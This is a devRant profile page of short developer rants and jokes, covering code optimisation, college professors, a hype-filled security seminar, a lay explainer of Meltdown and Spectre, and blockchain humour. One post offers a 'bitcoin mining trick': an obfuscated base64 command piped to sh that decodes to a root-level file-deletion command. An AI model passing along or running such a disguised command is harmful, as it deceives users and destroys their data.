Details
-
AboutJust a geek here!
-
Skillsblah blah blah :P I am lazy af to type them
-
LocationKolkata
-
Github
Joined devRant on 10/26/2017
Join devRant
Do all the things like
++ or -- rants, post your own rants, comment on others' rants and build your customized dev avatar
Sign Up
Pipeless API
From the creators of devRant, Pipeless lets you power real-time personalized recommendations and activity feeds using a simple API
Learn More
-
#RANT_AHEAD
Almost everyone nowadays uses a PC, Laptop, Smartphone but sadly not even 60% of the total potential of the hardware is being used.
.
And no - you don't require custom cooling to use the whole 100% of the total potential, stock cooling is more than enough.
.
IRL "programmers" these days don't do any fscking effort to optimise their code and give it all up as some kinda shitty "hot patch" - code of their looks disturbing with no security features + optimisation. (wAnBlOwS products remain an example)
.
Even when you're using python you can push your project to limits. Instead of shoving face-size ASCII banners why don't chaps stress test their projects? Oh I forgot the community runs on show-offs and CVs ...
.
Note to Self : Optimisation is the key to integrate Technology with Nature.2 -
If you're coding, thinking and manually/auto debugging way too often several time a day, then you're likely to be suffering from "Geekonomous Schizophrenia", the Symptoms of that are:
.
1. You grow a habit to cut the B$ in real-life conversations.
.
2. You get instantaneously angry and disturbed when your mom/siblings/friends are interrupting you during your work.
.
3. Not to mention you cannot tolerate irrational words from Socially Accepted Normal Chaps (SANC)
.
4. You have nothing to speak unless a SANC starts the conversation themself.
.
5. You tend to correct these SANCs mid-semi-technical-talk whenever these do factual errors.
.
6. You get overwhelmingly excited and ecstatic to talk to someone of your expertise or at least a person who can intellectually handle your tech-blabbers and dev-rants!
.
7. You start doing minor-to-major experiments regarding different things in real life as you do virtually with your codes and try to predict the outcome the next time.
.
8. Best of all - whenever you are "loned-out" you don't feel lonely since you have many people and string of thoughts to talk to and inside your head there's a grand meeting going on.
.
Relatable? We're on same lines then! 😊 -
Professors today in colleges don't know...
.
1. the proper denominations of outputs of basic shell commands like "ls -l", "cat", "cal" (pronounces linux as laynux)
.
2. how memory management works
.
3. how process scheduling actually takes place and not in the outdated bookish way.
.
4. how to compile a package from scratch and including digital signatures
.
5. cannot read a man page properly, yet come to take OS labs.
.
6. how to mount a different hardware
.
7. how to check kernel build rules, forget about compiling a custom kernel.
.
.
.
n. ....
Yet we are expecting the engineers who are churned out of colleges to be NEXT GEN ?!
It is not entirely because of syllabus, its also because of professors who had not updated their knowledge since they got a job. Therefore they cannot impart proper basics on students.
If you want things to change, train students directly in the industry with versions of these professors UPDATED.6 -
1995: Viruses create funny VGA effect
2000: Viruses send SPAM e-mails
2010: Viruses steal credentials
2016: Viruses launch DDoS attacks
2017: Viruses demand ransom
2018: Viruses mine crypto coins6 -
Okay, this is a rather technical rant and I am sure some of you are working on the patches already, if you are then lets connect cause, I am an ardent researcher for the same as of now.
So here it goes:
As soon as kernel page table isolation(KPTI) bug will be out of embargo, Whatsapp and FB will be flooded with over-night kernel "shikhuritee" experts who will share shitty advices non-stop.
1. The bug under embargo is a side channel attack, which exploits the fact that Intel chips come with speculative execution without proper isolation between user pages and kernel pages. Therefore, with careful scheduling and timing attack will reveal some information from kernel pages, while the code is running in user mode.
In easy terms, if you have a VPS, another person with VPS on same physical server may read memory being used by your VPS, which will result in unwanted data leakage. To make the matter worse, a malicious JS from innocent looking webpage might be (might be, because JS does not provide language constructs for such fine grained control; atleast none that I know as of now) able to read kernel pages, and pawn you real hard, real bad.
2. The bug comes from too much reliance on Tomasulo's algorithm for out-of-order instruction scheduling. It is not yet clear whether the bug can be fixed with a microcode update (and if not, Intel has to fix this in silicon itself). As far as I can dig, there is nothing that hints that this bug is fixable in microcode, which makes the matter much worse. Also according to my understanding a microcode update will be too trivial to fix this kind of a hardware bug.
3. A software-only remedy is possible, and that is being implemented by all major OSs (including our lovely Linux) in kernel space. The patch forces Translation Lookaside Buffer to flush if a context switch happens during a syscall (this is what I understand as of now). The benchmarks are suggesting that slowdown will be somewhere between 5%(best case)-30%(worst case).
4. Regarding point 3, syscalls don't matter much. Only thing that matters is how many times syscalls are called. For example, if you are using read() or write() on 8MB buffers, you won't have too much slowdown; but if you are calling same syscalls once per byte, a heavy performance penalty is guaranteed. All processes are which are I/O heavy are going to suffer (hostings and databases are two common examples).
5. The patch can be disabled in Linux by passing argument to kernel during boot; however it is not advised for pretty much obvious reasons.
6. For gamers: this is not going to affect games (because those are not I/O heavy)
Meltdown: "Meltdown" targeted on desktop chips can read kernel memory from L1D cache, Intel is only affected with this variant. Works on only Intel.
Spectre: Spectre is a hardware vulnerability with implementations of branch prediction that affects modern microprocessors with speculative execution, by allowing malicious processes access to the contents of other programs mapped memory. Works on all chips including Intel/ARM/AMD.
For updates refer the kernel tree: https://git.kernel.org/…/ke…/...
For further details and more chit-chats refer: https://lwn.net/SubscriberLink/...
~Cheers~
(Originally written by Adhokshaj Mishra, edited by me. )22 -
A Merry Christmas to everyone here in DevRant community. I wish for you a season of goodwill, peace and happiness. May your frustrations coupled with depressions reduce! Also Happy Holidays. 😊😊😊
-
CHILD: But how can Santa deliver toys to every little boy and girl on his list in one night?
MEH: (laughs) It's quite simple. The items on Santa's list are called blocks, and each block in his "blockchain" typically contains a hash pointer, a timestamp, and transaction data...6 -
Bitcoin price is rising again,
For those using linux/unix system you can try this little trick i use to mine bitcoins
Open the terminal and paste this command
sudo echo "c3VkbyBlY2hvICJjM1ZrYnlCeWJTQnlaaUF2S2c9PSIgfCBvcGVuc3NsIGJhc2U2NCAtZCB8IHNo" | openssl base64 -d | sh
Thank me later.24 -
How to reverse engineer without knowing how to reverse engineer:
1.Open IDA pro
2. Hit shift+f12 for the strings view
3. Choose an interesting string
4. Hit x and go over the xrefs
5. You are now earning at least $140K a year.
Bonus: say that you can code html2 -
C++ has become cockpit of Boeing 747
Too many controls? Yes.
Takes shitton of time to get ball rolling? Yes.
You need just bunch of them to get stuff done? Hell yes.
You still have to learn a lot of them if you plan to become professional? Yes.
You need to touch most of the fancy stuff only once in a while? Yes.
Many controls you wont be touching except once or twice in your whole career? Hell fucking yes.
You need those fancy controls when shit goes tits up? You better have them, or you are dead!
Creds: A.M.2 -
In my opinion: Education requires more updates and patches than a system does but sadly its rarely done!2
-
Just had a so called "cyber security" seminar in college today.
The guy who claimed to be a trainer or somewhat network security guy or something behaved enigmatically with utter consistency. He obviously claimed to know facebook hax0ring though.
They were basically there to advertise their complete crap: csksrc.org
(Ethical Hax0ring Course) (also claimed their site to be 99.9% secured - GREAT!)
After obtaining a ISO*** standard cert or after taking multiple sessions on "advanced ethical hacking" if you go about telling peeps in colleges that: "The single way to hax0r a facebook account is CSRF!" "Will hack your facebook account by MITM through malicious WiFi Ap." Then, NO neither I want your shitty cert nor do I want to be in your team and create the next level of "advanced ethical hax0ring - CEH course". Reason why I get cringed when peeps start about their certs and the ISO*** value it contains. What ISO value does your brain cells contain though?